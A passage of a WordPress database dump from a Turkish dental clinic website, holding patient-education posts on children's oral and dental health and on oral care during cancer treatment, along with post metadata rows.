Dişin çıkacağı bölgede diş eti kabarmıştır. Bütün bu şikayetler dişlerin çıkması ile kaybolur. Bu şikayetleri giderecek bir ilaç yoktur. Ancak yemeklerden önce uygulanmak üzere eczanelerde satılan pomatlardan yararlanılabilir.\r\n\r\nEskiden diş sürme çağına gelen çocuğun her şikayeti diş çıkarmaya bağlanırdı. Her ne kadar diş sürmesi genel sağlık üzerinde bazı etkiler gösteriyorsa da havale, ishal, bronşit gibi hastalıkların nedeni artık diş sürmesine bağlanmıyor. Çocuğun genel durumundaki bozukluktan diş sürmesini sorumlu tutabilmek için başka bütün nedenlerin araştırılması gerekir.\r\n\r\n<strong>Süt dişleri ve kalıcı dişlerin çıkış takvimi nasıldır?</strong>\r\n\r\nGenel olarak bebeklerde ilk dişler 6 aylıkken sürmeye başlar. 24 -30 aylar arasında süt dişlerinin sürmesi tamamlanır. Süt dişleri tamamlanmış bir çocukta her bir çenede 10 adet olmak üzere toplam 20 adet diş bulunur. Bazense bebekler dişli doğabilir ya da doğumdan hemen sonra diş sürebilir. Bu dişler genellikle sallanan dişlerdir, bebek yutabilir ya da nefes borusuna kaçabilir düşüncesiyle çekimi gerekir. Yaratacağı bir diğer problem de beslenme sırasında annenin göğüs ucunun tahriş olmasıdır. Böyle bir durumda diş hekiminin müdahalesi gerekir.\r\n\r\nBebeğin kendisine bağlı birtakım faktörlerin etkisiyle diş çıkarmada gecikmeler de yaşanabilmektedir. Bu durum 1 yaşına kadar normal kabul edilir. Ancak bebek 1 yaşına bastığı halde ağzında diş yoksa nedeninin araştırılması için bir dişhekimine götürülmesi gerekir.\r\n\r\n6 yaşında süt azıların arkasından ‘6 yaş dişleri’ dediğimiz daimi dişler sürmeye başlar. Bu dişler, alt ve üst çenede sağlı sollu ikişer tane olmak üzere toplam dört tanedir. Genellikle süt dişi zannedildikleri için çürüdüklerinde tedavi edilmeyip çekilirler. Halbuki diş sistemi için çok önemli olan bu dişlerin çekilmesi, dişlerde tedavisi çok zor olan çapraşıklıklara neden olur. Ömür boyu ağızda kalan ve çiğnemenin merkezi olan bu ilk kalıcı dişleri korumak için ‘fissür örtücü’ denilen dişi çürüğe karşı koruyan uygulamalar yapılmalıdır.\r\n\r\nSüt dişleri daimi dişlerin çıkacakları yeri korurlar. Süt dişleri erken zamanda çekilmek zorunda kalınırsa, bu alanı korunmak amacıyla ‘yer tutucular’ kullanılmalıdır. Kalan dişlerin durumu ve çocukların uyum durumuna bağlı olarak hareketli (takmalı çıkarmalı) veya sabit (yapışmalı) olarak hazırlanabilirler.\r\n\r\n7-11 yaşlar arasında süt dişleri sallanır ve alttan gelen kalıcı dişler onların yerini alır.\r\n\r\n12 yaşında 6 yaş dişlerinin arkasından ikinci daimi büyük azılar çıkar. 6 yaş dişleri gibi bunlar da bir süt dişinin yerine sürmeyen dişlerdendir.\r\n\r\n<strong>Diş renkleşmelerinin sebebi nedir?</strong>\r\n\r\nTıpkı çocuklarda veya erişkinlerde olduğu gibi bebeklerde de henüz yeni sürmüş süt dişlerinde renkleşmeler görülebilir. Bunun en önemli sebebi ‘bakteri plağı’dır. Eğer bebeğinizin dişlerinde sarımtırak veya portakal rengi tarzında bir görüntü oluşmaya başlarsa, bu bakteri plağının bebeğinizin dişlerine yapıştığının bir işaretidir.\r\n\r\nBakteri plağı oldukça yapışkan ve içerisinde adından da anlaşılacağı üzere bakteri kolonileri ihtiva eden kompleks bir oluşumdur. Bebeklerde ve çocuklarda diş fırçalamasının ihmal edildiği durumlarda 24 saat içerisinde oluşur ve hızlı bir şekilde olgunlaşarak dişler üzerinde kalıcı hasarlar bırakabilir.\r\n\r\nBakteri plağı, bebeklerde ve çocuklarda diş çürükleri ile dişeti problemlerinden birinci derece sorumlu bir oluşumdur. Böyle bir görüntüyü bebeğinizin ağzında gördüğünüz anda mutlaka bebekler için üretilmiş olan yumuşak kıllı bir fırça ile dişlerini temizleyin. Eğer bakteri plağını dişlerin üzerinden uzaklaştırmakta zorlanıyorsanız o zaman çok az (leblebi tanesinin yarısı kadar) çocuk diş macunu kullanarak plağı kaldırmaya çalışınız. Tüm bu çabalara rağmen dişler üzerindeki lekeler uzaklaşmıyorsa mutlaka pedodontistinize/çocuk diş hekiminize başvurunuz.\r\n\r\nUnutmayın ki; diş çürüklerinin bebeklerde ilk görüntüsü de beyaz/sarımtırak bir karakter sergilemektedir.\r\n\r\nEğer bebeğinizin dişlerinde siyah renkleşmeler gözlemlerseniz; bu siyah lekeleri hemen diş çürükleri olarak değerlendirmeyin. Genellikle bebeğiniz için kullanmış olduğunuz demir preparatları veya multivitamin damlaları dişlerin üzerinde geçici siyah lekeler bırakabilir. Dişlerin düzenli diş fırçalaması ile bu lekelerin hiç oluşmamasını veya çok az oluşmasını sağlayabilirsiniz.\r\n\r\nBu arada yeri gelmişken birçok anne-babanın belirttiği “bebeğimizin dişleri kullandığı antibiyotikten sarardı” yakınmalarını da biraz aydınlatalım. Günümüzde bebekler/çocuklar için kullanılan antibiyotikler birçok araştırma ve geliştirme aşamalarından sonra insanların/hekimlerin kullanımına sunuluyor. Şu anda çocuk doktorunuzun yazacağı hiçbir antibiyotik dişleri renkleştirmez. Fakat bebeğinizin dişlerini hasta olduğu dönemde fırçalamazsanız yediği/içtiği besinler gibi antibiyotik de onun dişlerine bakteri plağı olarak yapışır ve geçici (dişler fırçalanana kadar) renkleşmeler yapabilir.\r\n\r\nSüt dişlerinde görülen bir diğer renkleşme de travmalara bağlı görülenlerdir. Bebeğiniz özellikle yeni yürümeye başladığında biraz merak biraz da kaza sonucu mutlaka düşerler. Bazen bu düşmeler onları ağlatmayacak kadar basit olabilirken, bazen de ciddi sorunlar çıkarabilir. Eğer dişlerinin üzerine düşerse; düşmenin şiddetine bağlı olarak dişler canlılıklarını kaybedebilir ve dişlerin rengi mat grimsi bir hal alabilir. Bu gibi durumlarda mutlaka çocuk diş hekiminize derhal başvurunuz.\r\n\r\nŞu ana kadar bahsedilen tüm renkleşmeler dişlerin temizlenmesi ile uzaklaştırılabilen geçici renklenmelerdir. Bunlara ek olarak süt dişlerinde ve daimi dişlerde fazla fluor tüketilmesine bağlı ve hamilelik döneminde veya doğumdan sonraki ilk aylarda yüksek ateşe bağlı enfeksiyonlar da diş renkleşmelerine sebep olabilir. Bu gibi durumlarda detaylı bilgiyi pedodontistinizden alabilirsiniz.\r\n\r\n<strong>Çocuklardaki dişhekimi korkusunu aşmak için neler yapılmalıdır?</strong>\r\n\r\nÇocuğunuza diş tedavisinin korkulacak bir yanı olmadığını anlatırsanız, kolaylıkla diş hekimine götürebilirsiniz. Ancak genelde ebeveynler dişçiye gitmeyi bir korku unsuruna dönüştürür. Bu nedenle:\r\n<ul>\r\n 	<li>Çocuğun diş hekimine götürülmesi bir ceza anlamı taşımamalıdır. Tam aksine severek gideceği bir ortam yaratılmalıdır.</li>\r\n 	<li>Dikkat edilmesi gereken başka bir konu da, diş hekimine gitme ile çocuğun maruz kalacağı ağrı olayı arasında bir çağrışım uyandırmamaktır. Çocuğa “Dişin hiç ağrımayacak”, “Doktor iğne yapmayacak” diyerek onu yanıltmak ilerideki tedavileri güçleştirir.</li>\r\n 	<li>Diş hekimi ile çocuğun iyi bir diyalog kurması, çocuğun korkusunu yenmesine yardımcı bir faktördür. Bunun için diş hekiminin sorduğu sorulara çocuğun kendisinin yanıt vermesine izin verilmelidir.</li>\r\n</ul>\r\n<strong>Süt dişleri tedavi edilmeli midir?</strong>\r\n\r\nSüt dişleri normal dişlere oranla daha çok organik madde içerirler, bu nedenle kolay ve hızlı çürümeye yatkınlardır. Süt dişleri de tıpkı kalıcı dişlerde olduğu gibi tedavi edilmelidir. Ayrıca değişecek düşüncesiyle bu dişlerin çekilmesi pek çok problemlere neden olur. Süt dişlerinin önemini şöyle açıklayabiliriz;\r\n<ul>\r\n 	<li>Süt dişlerinin beslenmede önemlidir. Çürük dişleri olan çocuklar dişleri ağrıdığı için doğru dürüst yemek yiyemezler. Aynı şekilde dişleri çekilen çocuklar da yemek yiyemedikleri için büyüyüp gelişemezler.</li>\r\n 	<li>Süt dişleri çene gelişimi için de gereklidir. Çürük ya da dişeti problemi nedeniyle dişleri çekilen çocuklarda çeneler çöker ve yaşlı bir görünüm alır.</li>\r\n 	<li>Dişler konuşmak için gereklidir. Özellikle konuşmanın öğrenildiği dönemde ön süt dişlerinin eksik olması f, v, s, z, t harflerinin bir alışkanlık haline gelerek ömür boyu yanlış telaffuz edilmesine neden olacaktır.</li>\r\n 	<li>Her çocuk gülmeyi sever. Güzel bir gülümseme için ise sağlıklı dişlere ihtiyaç vardır.</li>\r\n 	<li>Güzel görünmek büyük küçük her insanın en doğal isteğidir. Çürük ya da eksik dişleri olan çocuklar çirkin göründüklerini düşünerek psikolojik rahatsızlık duyarlar.</li>\r\n 	<li>Süt dişlerinin bir diğer görevi de alttan gelen daimi dişlerin yerini korumaktır. Bir süt dişi zamanından önce çekilirse yandaki dişler bu boşluğa doğru kayar. Alttan gelecek kalıcı dişe yer kalmaz. Bu diş diğerlerini sıkıştırır, sonuç olarak çapraşıklıklar meydana gelir.</li>\r\n</ul>\r\n<strong>Çocuklarda ağız bakımı nasıl olmalıdır?</strong>\r\n\r\nİlk dişler ağızda görünür görünmez, temizlenmeye başlanmalıdır. Temiz bir tülbent ya da gazlı bez kullanılarak; sabah kahvaltı sonrası ve gece yatmadan önce dişlerin silinerek temizlenmesi gerekir. Diş fırçası kullanımına bebeğin arka dişlerinin çıkmasından sonra başlanabilir. İlk fırçalama girişimleri oldukça zor, hatta başarısız olabilir fakat zamanla bu bebeğinizin de hoşuna giden bir alışkanlık halini alacaktır. Özellikle süt dişlerinin yeni sürmeye başladığı zamanlarda fırçalamanın düzenli olarak yapılması diş etlerine masaj etkisi yaparak bebeğinizin rahatlamasına ve diş sürme ağrılarının azalmasına sebep olacaktır.\r\n\r\nOkul öncesi çocuklarda önemli olan, çocuğa diş fırçalama alışkanlığını kazandırmaktır. Sabah kahvaltı öncesi ve gece yatmadan önce, sadece üçer dakikalık etkili bir fırçalama işlemi yeterlidir. Ancak çocuklar diş fırçalarken çoğu zaman dişlerin görünen ya da kolay ulaşılan yüzlerini fırçalar. Oysaki mikroplar, dişlerin ara yüzleri ya da çiğneyici yüzeylerinde daha kolay birikir. Bu nedenle fırçalamadan sonra ebeveyn kontrolü şarttır.\r\n\r\nÇocuğun ağız büyüklüğüne uygun, yumuşak ve naylon kıllardan üretilmiş diş fırçaları kullanılmalıdır. Sert fırçalar dişleri aşındıracağı için kullanımı uygun değildir. Fırçalar, ortalama 6 ay sonra mutlaka değiştirilmelidir.\r\n\r\nAilelerin bir diğer sıkça sordukları soru ise diş fırçalama esnasında diş macunu kullanımı ile ilgili kaygılardır. Genellikle bebekler ve çocuklar diş macununun tadını çok severler ve fırçalama esnasında diş macununu yutarlar. Bu sebepten dolayı 2,5-3 yaşından daha küçük çocuklarda diş fırçalanmasında diş macunu kullanılmaması daha doğru bir yaklaşım olacaktır. Fakat bu konuda tüm çocuklar adına bir genelleme yapmak doğru olmayacaktır. Bu sebepten dolayı bebeğinizin dişlerini fırçalarken macun kullanıp kullanılmayacağını pedodontistinize danışarak karar vermeniz yapılacak en doğru işlemdir. Unutmayın ki; çocukların fazlaca yutabilecekleri fluorlu diş macunu onların hem dişleri hem de genel vücut sağlığı açısından sorun yaratabilir.\r\n\r\n<strong>Çocuklara diş fırçalama alışkanlığı nasıl kazandırılır?</strong>\r\n<ul>\r\n 	<li>Dişlerini fırçalarken ayrı bir diş fırçası ile siz de kendi dişlerinizi fırçalayın.</li>\r\n 	<li>Ona birkaç tane diş fırçası alın. Bu fırçalar farklı renkte ve değişik çizgi roman kahramanlarının olduğu fırçalar olsun. Her seferinde başka bir fırça seçmesini sağlayın. Bu seçim onun diş fırçalama isteğini ve motivasyonunu artıracaktır.</li>\r\n 	<li>Önce kendisinin dişlerini fırçalamasına izin verin sonra siz onun, o da sizin dişlerinizi fırçalasın.</li>\r\n 	<li>Evde mutlaka diş fırçalama panosu oluşturun ve her fırçalamadan sonra pano üzerinde işaretleme yapın.</li>\r\n 	<li>Banyoya bir kum saati yerleştirin ve her fırçalamada kum saatini ters çevirerek zaman tutun. Yaklaşık 2 dakikalık diş fırçalama yeterli olacaktır.</li>\r\n 	<li>Unutmayın ki bebeğiniz veya çocuğunuzun diş çürüğü hakkında hiçbir bilgisi yoktur. Ona yapışkan özelliği olan şeker, çikolata veya bisküvi yedirin ve aynada dişlerin üzerine nasıl yapıştığını gösterin. Daha sonra dişlerini fırçalatın ve dişlerinin ne kadar güzel, temiz ve beyaz olduğunu ona aynada gösterin.</li>\r\n</ul>\r\nUnutulmamalıdır ki düzenli diş fırçalama çocuğunuzun ileride oluşabilecek diş problemlerinin önlenmesinde büyük rol oynayacaktır.\r\n\r\n<strong>Çocuğun beslenme şekli onun diş sağlığını etkiler mi?</strong>\r\n\r\nSağlıklı beslenme, çocuğun büyümesi ve gelişimi için gerekli tüm gıdaların dengeli bir şekilde alınması demektir. Yani sebze, meyve, süt, et, balık ve yumurta gibi ana besin gruplarını düzenli bir şekilde tüketmesi gerekmektedir. Bu onun genel vücut gelişimini etkilediği gibi onun diş/dişeti gelişiminde de çok önemli rol oynamaktadır. Örneğin karbonhidrattan zengin beslenme düzenine sahip bir çocuk diş çürüklerinin oluşumu açısından risk altındadır. Bu nedenle;\r\n<ul>\r\n 	<li>Alışveriş yaparken şeker ve nişasta içeren gıdalar konusunda daha seçici davranarak bu gıdaların tüketimini azaltmaya çalışın. Bu gıdaları sadece ana öğünlerde tüketmesine izin verin.</li>\r\n 	<li>Çocuğunuzun beslenme zamanlarını düzenleyin ve her öğünde besleyici değeri yüksek gıdalarla beslenmesini sağlayın.</li>\r\n 	<li>Bebeğinizin uyku sırasında biberonla uyumasına izin vermeyin.</li>\r\n 	<li>Eğer çocuğunuz sakız çiğnemeyi seviyorsa şeker içermeyen sakızları çiğnemesini sağlayın.</li>\r\n</ul>\r\n<strong>Acil durumlarda nasıl davranılmalıdır?</strong>\r\n\r\nÇocuklarda oluşabilmesi muhtemel acil diş sorunlarını iki grupta toplayabiliriz:\r\n<ul>\r\n 	<li>Çarpma/düşme sonucu meydana gelen yaralanmalar</li>\r\n 	<li>Diş ağrısı</li>\r\n</ul>\r\n<strong>Çarpma/düşme sonucu meydana gelen yaralanmalar</strong>\r\nPek çoğumuzun bildiği gibi çocuklar yürümeyi düşe kalka öğrenirler. Bu düşmeler genellikle hasarsız atlatılabildiği gibi, bazen istenmeyen durumlarla da karşılaşılabilir. Eğer çocuk süt dişlenme dönemindeyse (0-6 yaş) çarpma ve düşme nedeniyle bazen ön süt dişleri çene kemiği içerisine tamamen veya kısmen gömülebilir. Genellikle 3-9 ay içerisinde bu dişler tekrar eski yerlerinden sürerler. Ancak çarpma esnasında bu dişlerin altındaki daimi dişlerin zedelenme ihtimalinin yanı sıra, çenede kırıklar da olabileceğinden en kısa sürede bir pedodontist/diş hekimine başvurulmalıdır.\r\n\r\nDiş hekimine gidene kadar geçen süre içinde ılık su ile ağzın çalkalanması ve yaralanma yerine soğuk kompres yapılması sonra oluşabilecek şişmeleri önleyecektir. Yaralanma sonucunda yerlerinden çıkan daimi dişler tekrar yerlerine oturtulduklarında, iyileşme şansı çok yüksektir. Dişin yuvasından tamamen çıktığı durumlarda, diş düştüğü yerden kök ucuna değmeden tutularak, serum fizyolojik, süt veya bunların bulunamadığı durumlarda su içine konularak vakit geçirmeden diş hekimine gidilmelidir. Unutulmamalıdır ki; yapılacak erken müdahaleler ileride oluşabilecek ciddi sorunları önlemektedir.\r\n\r\n<strong>Diş ağrısı</strong>\r\nEn sık karşılaşılan durumlardan biri de genellikle geceleri meydana gelen ani diş ağrılarıdır. Bu gibi durumlarda çocuğu rahat ettirmek için önce ağzını su ile çalkalayın. Daha sonra dişlerini diş fırçası ve diş ipi ile temizleyin. Bazen sadece bu iki metot sayesinde; dişlerin arasına sıkışmış gıda artıkları çıkarılarak çocuğunuzun diş ağrısını kolayca geçirebilirsiniz. Eğer bu iki işlem yapıldığı halde ağrı geçmiyorsa; dişlerde ‘pulpitis ağrısı’ dediğimiz ağrılı durum başlamış demektir. Mevcut ağrıyı hafifletmek için ağrıyan dişin olduğu bölgeye soğuk su veya buz tatbiki yapın. Soğuk tatbiki ağrının azalmasına sebep olacaktır. Kesinlikle ağrıyan dişin üzerine SICAK SU veya ASPİRİN uygulamayın. Tüm bu işlemlere rağmen ağrısı kesilmiyorsa diş hekiminizin önereceği ağrı kesici bir şurup veya tablet kullanılması ağrının azalmasına yol açacaktır.\r\n\r\nYukarıda bahsedilen tüm acil durumlarda yapmanız gereken ilk iş pedodontist/diş hekiminize derhal ulaşmak olacaktır. Bu sebepten dolayı doktorunuzun telefon numaralarını bu gibi acil durumlarda kullanılmak üzere mutlaka kolay erişebileceğiniz bir yere kaydedin.[/vc_column_text][/vc_column][/vc_row]', 'Çocuklarda Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '6282-revision-v1', '', '', '2018-07-13 13:54:05', '2018-07-13 10:54:05', '', 6282, 'http://www.ze-dent.com/6282-revision-v1/', 0, 'revision', '', 0),
(6285, 1, '2018-07-13 14:01:34', '2018-07-13 11:01:34', '[vc_row][vc_column][vc_column_text]<strong>Ağız içi problemlerin ortaya çıkmasına neden olan kanser tedavileri hangileridir?</strong>\r\n<ul>\r\n 	<li>Kemoterapi (ilaç tedavisi),</li>\r\n 	<li>Radyoterapi (ışın tedavisi),</li>\r\n 	<li>Sakinleştirici ve ağrı kesici olarak kullanılan yardımcı ilaçlar,</li>\r\n 	<li>Baş boyun bölgesindeki dokuların cerrahi müdahale ile çıkarılması,</li>\r\n 	<li>Kemik iliği nakli,</li>\r\n 	<li>Bağışıklık sistemini güçlendirmek için kullanılan ilaçlar…</li>\r\n</ul>\r\n<strong>Kanser tedavisi öncesi ağız içinde ne gibi önlemler alınmalıdır?</strong>\r\n\r\nKanser tedavisi sırasında yalnızca acil tedaviler yapılabileceğinden ağız içinde hastalık oluşturabilecek her türlü önlemin önceden alınması gerekmektedir. Örneğin;\r\n<ul>\r\n 	<li>Ağız içinde rahatsızlıklara neden olan diş taşlarının temizlenmesi, hatalı dolgu ve protezlerin düzeltilmesi,</li>\r\n 	<li>Diş eti problemleri ve diş çürüklerinin tedavi edilmesi,</li>\r\n 	<li>Hastalardan ölçü alınarak özel kaşıkların hazırlanması. (Bu kaşıklar tedavi öncesi ve sonrasında dişlerin korunması için flor jeli uygulamasında kullanılmaktadır.)</li>\r\n</ul>\r\n<strong>Baş boyun bölgesine uygulanan radyasyonun ağız içindeki etkileri nelerdir?</strong>\r\n<ul>\r\n 	<li>Radyasyona bağlı ağız mukozasındaki hücre ölümleri, genellikle tedaviden 5-10 gün sonra başlayıp, 3-4 hafta sonra tamamen iyileşen ‘mukozit’ denilen küçük ağız yaralarının oluşmasına neden olur.</li>\r\n 	<li>Radyasyon, tükürük kalite ve miktarında azalmaya yol açar. Tükürük akışının bozulmasına bağlı olarak ağız kuruluğu başlar, takiben kanamalar meydana gelebilir. Tükürüğün çürüğü önleme, ağzı ve dişleri temizleme fonksiyonu azalır. Tat alma duyusunda bozulmalar, dişlerde soğuk-sıcak hassasiyeti, yutma, çiğneme ve konuşma fonksiyonlarında zorlanmalar olur.</li>\r\n 	<li>Radyasyona maruz kalmış kemikte hücre azalması ve oksijen yetersizliği nedeniyle yeterli iyileşmenin olmaması sonucu kemik dokusunun canlılığını kaybetmesi olan ‘osteoradyonekroz’ oluşur, özellikle alt çenede daha yaygındır.</li>\r\n 	<li>Radyoterapiden sonra tedavi sahasındaki damarlarda kan akımını azaltan bir daralma ve tıkanma söz konusu olur. Çiğneme kasları ve çene eklemindeki doku değişiklikleri ile sonuçlanan bu durum yutma, çiğneme ve konuşma fonksiyonlarında çok ciddi bir zorlanmaya neden olur.</li>\r\n 	<li>Radyasyon sahasında dişeti bağlarındaki zayıflamadan dolayı olan sallanma nedeniyle diş kayıplarına sıklıkla rastlanabilir.</li>\r\n</ul>\r\n<strong>Kemoterapinin ağız içinde neden olduğu sorunlar nelerdir?</strong>\r\n<ul>\r\n 	<li>Bazı kemoterapi ilaçları ağız yaralarına ve iltihaplara neden olabilir.</li>\r\n 	<li>Bakteri, virüs ve mantar enfeksiyonları, bağışıklık sisteminin zayıflamasıyla oldukça sık karşımıza çıkar.</li>\r\n 	<li>Tat alma duyusu değişebilir. Yiyeceklerin tadı daha tuzlu,ekşi ve metalik gelebilir. (Kemoterapi bitince tat alma duyusu da normale dönecektir.)</li>\r\n 	<li>Tedavide yardımcı olarak kullanılan sakinleştirici ve ağrı kesicilerin uzun süren kullanılmaları tükürük akışını azaltan, çürük oluşumunu artıran etkiler göstermektedir.</li>\r\n</ul>\r\n<strong>Kanser hastalarında ağız bakımı nasıl olmalıdır?</strong>\r\n<ul>\r\n 	<li>Hastalar ağız içi olumsuzlukların şiddetini azaltmak için ağız hijyenlerini korumaya teşvik edilmeli, günde 3-4 kez, özellikle yemeklerden sonra 30 dakika içinde ve yatmadan önce ağız temizliğini yapmalıdır.</li>\r\n 	<li>Diş fırçalama çok yumuşak bir fırça yardımıyla baskı uygulamaksızın antitartar, peroksit ihtiva etmeyen florür ve karbonat içeren bir diş macunu ile yapılmalıdır. İki ayrı diş fırçası değiştirilerek kullanılmalı ve klorheksidinli veya hipokloritli solüsyonlarda yıkanarak, kurutulmalıdır.</li>\r\n 	<li>Ağız duşu ve elektrikli diş fırçası kullanımı tavsiye edilmez.</li>\r\n 	<li>Hasta eğer dişipi kullanıyorsa mumlu ve şerit diş ipi kullanması önerilir eğer kullanmıyorsa kullanıma alıştırmak için uygun bir zaman değildir.</li>\r\n 	<li>Dişler fırçaladıktan sonra günde en az dört kez, sabah, öğle, akşam yemeğinden sonra ve gece yatmadan önce 1 su bardağı kaynatılıp soğutulmuş suya yarım çay kaşığı karbonat (yemek sodası) ilave edilerek hazırlanan ağız gargarası yapılması tavsiye edilir.</li>\r\n 	<li>Özellikle kemoterapiden 7-10 gün sonraki dönemde dişler fırçalanmamalıdır, çünkü bu dönemde dişeti kanaması ve enfeksiyon riski vardır. Fırçalamak yerine ağız gargaraları ve karbonatlı gargara ile ağız temizlenmelidir.</li>\r\n 	<li>Kemoterapi sırasında görülebilen kusmalardan sonra karbonatlı su ile hasta sık sık gargara yapmalıdır.</li>\r\n 	<li>Eğer diş macunu ağzı veya dişleri sızlatıyor, fırçalama sırasında mide bulantısı oluyorsa, ağız karbonatlı gargara ile temizlenmelidir.</li>\r\n 	<li>Kanser tedavisi sırasında mümkünse hareketli protezler takılmamalıdır.</li>\r\n 	<li>Tedavi sonrası dişler düzenli fırçalanmalı, protezler her yemekten sonra ve gece yatarken kesinlikle ağzınızdan çıkarılarak temizlenmelidir. Damağa iyi oturmayan takma dişler kullanılmamalıdır. Protezler temizleyici sıvılar içinde saklanmalıdır.</li>\r\n 	<li>Mantar enfeksiyonu varsa tedavi sadece ağız içi dokulara değil protezlere de uygulanmalıdır.</li>\r\n 	<li>Kurumaya karşı dudaklar vazelin veya dudak yağları ile nemlendirilmelidir.</li>\r\n</ul>\r\n<strong>Ağız kurumasında alınacak genel önlemler</strong>\r\n<ul>\r\n 	<li>Sodalı gargaralar,</li>\r\n 	<li>Sakız, şeker, buz parçaları,</li>\r\n 	<li>Sıvı içeceklerin sık sık alınması,</li>\r\n 	<li>Asitli veya baharatlı gıdalardan kaçınma,</li>\r\n 	<li>Havayı nemlendirme,</li>\r\n 	<li>Tükürük akışını hızlandıran preparatlar…</li>\r\n 	<li>Kolay yutmayı sağlamak için sulu yiyecekler tercih edilmeli ve günde en az iki litre sıvı içilmelidir.</li>\r\n 	<li>Tahrişe neden olabilecek asitli, çok sıcak ve çok soğuk içeceklerden, alkol ve tütün kullanımından kaçınılmalıdır.</li>\r\n 	<li>Baş- boyun bölgesine uygulanan radyoterapide, yaşam boyu süren flor uygulaması, mevcut dişlerin muhafaza edilmesi ve kemik yıkımının önlenmesi açısından hayati önem taşır. flor uygulaması için özel ölçü kaşıkları hazırlanır. Florid kaşıklara konur, hasta ağzına yerleştirilir ve ısırtılır. Kaşıklar ağızda en az 5 dakika bırakılır sonra kaşıklar çıkarılır ve ağız durulanır. En az 30 dk. süreyle yenmez içilmez ve diş fırçalanmaz. Florid uygulaması günde 1-2 kez yapılmalıdır. Tüm bu önlemlere rağmen ağzınızda, görünüm, his veya tat yönünden bir değişiklik olduğunda doktorunuza veya hemşirenize haber vermelisiniz.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Kanser Hastalarında Ağız ve Diş Sağlığı', '', 'publish', 'closed', 'closed', '', 'kanser-hastalarinda-agiz-ve-dis-sagligi', '', '', '2018-07-18 20:43:38', '2018-07-18 17:43:38', '', 0, 'http://www.ze-dent.com/?p=6285', 0, 'post', '', 0),
(6286, 1, '2018-07-13 13:57:02', '2018-07-13 10:57:02', '', 'kanser-hastalari-agiz-ve-dis-sagligi', '', 'inherit', 'closed', 'closed', '', 'kanser-hastalari-agiz-ve-dis-sagligi', '', '', '2018-07-13 13:57:02', '2018-07-13 10:57:02', '', 6285, 'http://www.ze-dent.com/wp-content/uploads/2018/07/kanser-hastalari-agiz-ve-dis-sagligi.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6287, 1, '2018-07-13 14:01:34', '2018-07-13 11:01:34', '[vc_row][vc_column][vc_column_text]<strong>Ağız içi problemlerin ortaya çıkmasına neden olan kanser tedavileri hangileridir?</strong>\r\n<ul>\r\n 	<li>Kemoterapi (ilaç tedavisi),</li>\r\n 	<li>Radyoterapi (ışın tedavisi),</li>\r\n 	<li>Sakinleştirici ve ağrı kesici olarak kullanılan yardımcı ilaçlar,</li>\r\n 	<li>Baş boyun bölgesindeki dokuların cerrahi müdahale ile çıkarılması,</li>\r\n 	<li>Kemik iliği nakli,</li>\r\n 	<li>Bağışıklık sistemini güçlendirmek için kullanılan ilaçlar…</li>\r\n</ul>\r\n<strong>Kanser tedavisi öncesi ağız içinde ne gibi önlemler alınmalıdır?</strong>\r\n\r\nKanser tedavisi sırasında yalnızca acil tedaviler yapılabileceğinden ağız içinde hastalık oluşturabilecek her türlü önlemin önceden alınması gerekmektedir. Örneğin;\r\n<ul>\r\n 	<li>Ağız içinde rahatsızlıklara neden olan diş taşlarının temizlenmesi, hatalı dolgu ve protezlerin düzeltilmesi,</li>\r\n 	<li>Diş eti problemleri ve diş çürüklerinin tedavi edilmesi,</li>\r\n 	<li>Hastalardan ölçü alınarak özel kaşıkların hazırlanması. (Bu kaşıklar tedavi öncesi ve sonrasında dişlerin korunması için fluor jeli uygulamasında kullanılmaktadır.)</li>\r\n</ul>\r\n<strong>Baş boyun bölgesine uygulanan radyasyonun ağız içindeki etkileri nelerdir?</strong>\r\n<ul>\r\n 	<li>Radyasyona bağlı ağız mukozasındaki hücre ölümleri, genellikle tedaviden 5-10 gün sonra başlayıp, 3-4 hafta sonra tamamen iyileşen ‘mukozit’ denilen küçük ağız yaralarının oluşmasına neden olur.</li>\r\n 	<li>Radyasyon, tükürük kalite ve miktarında azalmaya yol açar. Tükürük akışının bozulmasına bağlı olarak ağız kuruluğu başlar, takiben kanamalar meydana gelebilir. Tükürüğün çürüğü önleme, ağzı ve dişleri temizleme fonksiyonu azalır. Tat alma duyusunda bozulmalar, dişlerde soğuk-sıcak hassasiyeti, yutma, çiğneme ve konuşma fonksiyonlarında zorlanmalar olur.</li>\r\n 	<li>Radyasyona maruz kalmış kemikte hücre azalması ve oksijen yetersizliği nedeniyle yeterli iyileşmenin olmaması sonucu kemik dokusunun canlılığını kaybetmesi olan ‘osteoradyonekroz’ oluşur, özellikle alt çenede daha yaygındır.</li>\r\n 	<li>Radyoterapiden sonra tedavi sahasındaki damarlarda kan akımını azaltan bir daralma ve tıkanma söz konusu olur. Çiğneme kasları ve çene eklemindeki doku değişiklikleri ile sonuçlanan bu durum yutma, çiğneme ve konuşma fonksiyonlarında çok ciddi bir zorlanmaya neden olur.</li>\r\n 	<li>Radyasyon sahasında dişeti bağlarındaki zayıflamadan dolayı olan sallanma nedeniyle diş kayıplarına sıklıkla rastlanabilir.</li>\r\n</ul>\r\n<strong>Kemoterapinin ağız içinde neden olduğu sorunlar nelerdir?</strong>\r\n<ul>\r\n 	<li>Bazı kemoterapi ilaçları ağız yaralarına ve iltihaplara neden olabilir.</li>\r\n 	<li>Bakteri, virüs ve mantar enfeksiyonları, bağışıklık sisteminin zayıflamasıyla oldukça sık karşımıza çıkar.</li>\r\n 	<li>Tat alma duyusu değişebilir. Yiyeceklerin tadı daha tuzlu,ekşi ve metalik gelebilir. (Kemoterapi bitince tat alma duyusu da normale dönecektir.)</li>\r\n 	<li>Tedavide yardımcı olarak kullanılan sakinleştirici ve ağrı kesicilerin uzun süren kullanılmaları tükürük akışını azaltan, çürük oluşumunu artıran etkiler göstermektedir.</li>\r\n</ul>\r\n<strong>Kanser hastalarında ağız bakımı nasıl olmalıdır?</strong>\r\n<ul>\r\n 	<li>Hastalar ağız içi olumsuzlukların şiddetini azaltmak için ağız hijyenlerini korumaya teşvik edilmeli, günde 3-4 kez, özellikle yemeklerden sonra 30 dakika içinde ve yatmadan önce ağız temizliğini yapmalıdır.</li>\r\n 	<li>Diş fırçalama çok yumuşak bir fırça yardımıyla baskı 